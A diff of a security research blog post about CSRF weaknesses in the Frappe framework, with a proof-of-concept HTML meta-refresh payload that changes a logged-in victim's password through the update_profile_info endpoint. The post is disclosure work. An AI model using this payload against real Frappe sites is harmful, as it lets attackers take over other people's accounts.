Habuon/habuon.github.io/_posts/2025-05-16-frappe-shallow-dive .md

 For example, when calling the `/api/method/frappe.utils.print_format.report_to_pdf` API endpoint, an attacker can use either a `GET` or `POST` request to trigger PDF generation, making it easier to exploit CSRF vulnerabilities.

 #### **1.3.
 Simple CSRF POC**
-When an attacker hosts the following HTML content on their domain `example.com.attacker.com`, they can change the password of a visitor who is logged in to Frappe hosted on `example.com`.
+When an attacker hosts the following HTML content on their domain `example.com.attacker.com`, they can change the password of a visitor who is logged in to Frappe hosted on `example.com` (more details in vulnerability no. 3).

 ```html
 <meta http-equiv="refresh" content="0; url=http://example.com/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info?profile_info=%7b%22new_password%22%3a%20%22TestPassword123456%3f%22%7d"/>